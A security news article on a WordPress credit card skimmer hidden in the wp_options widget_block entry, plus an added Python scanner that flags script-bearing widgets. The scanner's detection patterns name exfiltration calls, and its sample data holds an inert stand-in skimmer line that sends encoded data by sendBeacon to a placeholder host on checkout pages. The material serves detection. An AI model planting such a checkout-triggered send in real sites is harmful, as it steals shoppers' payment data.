New WordPress Credit Card Skimmer Hides in Database to Steal Payment Data

A sophisticated new credit card skimming campaign targeting WordPress e-commerce sites has been uncovered by cybersecurity researchers. The malware stealthily injects malicious code into WordPress database tables to steal payment information from unsuspecting customers.

The skimmer operates by embedding itself in the WordPress wp_options table under the "widget_block" entry, allowing it to avoid detection by security scanning tools. The malicious JavaScript is inserted through the WordPress admin panel's HTML block widget system.

When activated, the skimmer checks if a user is on a checkout page before launching its attack. It either creates a fake payment form mimicking legitimate processors like Stripe or captures data entered into real payment fields. The malware collects credit card numbers, expiration dates, CVV codes, and billing details.

To hide the stolen information, the skimmer applies multiple layers of encoding and encryption before sending it to attacker-controlled servers. The data is first Base64-encoded and then encrypted using AES-CBC to appear innocuous and resist analysis.

This attack represents an evolution in skimming techniques, as the malware's ability to hide within legitimate database tables makes it particularly difficult to detect. Website owners are advised to regularly monitor their WordPress installations for suspicious database entries and unauthorized widget modifications.
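
One way to act on the monitoring advice above, as an added example that is not from the original article or the researchers: a Python scanner that walks the PHP-serialized widget_block value from wp_options and flags widgets carrying script content. The marker list, the severity rule, and the sample value (with an inert stand-in script) are assumptions constructed for illustration.

```python
import re

# Heuristic markers (assumptions chosen for this example; tune per site).
MARKERS = {
    "checkout_check": re.compile(rb"checkout", re.I),
    "base64": re.compile(rb"\b(?:atob|btoa)\s*\(", re.I),
    "crypto": re.compile(rb"AES|crypto\.subtle"),
    "network_send": re.compile(rb"sendBeacon|XMLHttpRequest|\bfetch\s*\(", re.I),
}
SCRIPT = re.compile(rb"<script\b", re.I)
PHP_STR = re.compile(rb's:(\d+):"')

def php_strings(blob):
    """Yield each s:N:"..."; string of a PHP-serialized value, using its byte length."""
    pos = 0
    while (m := PHP_STR.search(blob, pos)):
        end = m.end() + int(m.group(1))
        if blob[end:end + 2] == b'";':
            yield blob[m.end():end]
            pos = end + 2          # skip the body so look-alikes inside it are ignored
        else:
            pos = m.end()          # length did not line up; keep scanning

def scan_widget_block(option_value):
    """Return (severity, markers, snippet) for every widget string holding a <script> tag."""
    findings = []
    for s in php_strings(option_value):
        if not SCRIPT.search(s):
            continue
        hits = sorted(k for k, rx in MARKERS.items() if rx.search(s))
        high = "checkout_check" in hits and len(hits) >= 2
        findings.append(("high" if high else "review", hits, s[:60].decode("utf-8", "replace")))
    return findings

def php_ser(text):
    """Serialize one string the way PHP does (helper for the constructed sample)."""
    raw = text.encode()
    return b's:%d:"%s";' % (len(raw), raw)

# Constructed sample option_value: three block widgets, one with an inert stand-in script.
WIDGETS = [
    "<p>Free shipping at checkout over $50</p>",
    '<script src="https://example.invalid/analytics.js"></script>',
    '<script>if(location.pathname.includes("checkout")){navigator.sendBeacon('
    '"https://example.invalid/c",btoa("placeholder"));}</script>',
]
SAMPLE = b"a:4:{" + b"".join(
    b"i:%d;a:1:{%s%s}" % (i + 2, php_ser("content"), php_ser(w)) for i, w in enumerate(WIDGETS)
) + b's:12:"_multiwidget";i:1;}'

if __name__ == "__main__":
    for finding in scan_widget_block(SAMPLE):
        print(finding)
```

Feed it the option_value of the widget_block row; any widget it reports should be compared against the widgets administrators actually created.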

The campaign follows similar recent attacks that used JavaScript malware to create counterfeit payment forms on e-commerce sites. These ongoing threats highlight the need for enhanced security measures on WordPress-based online stores.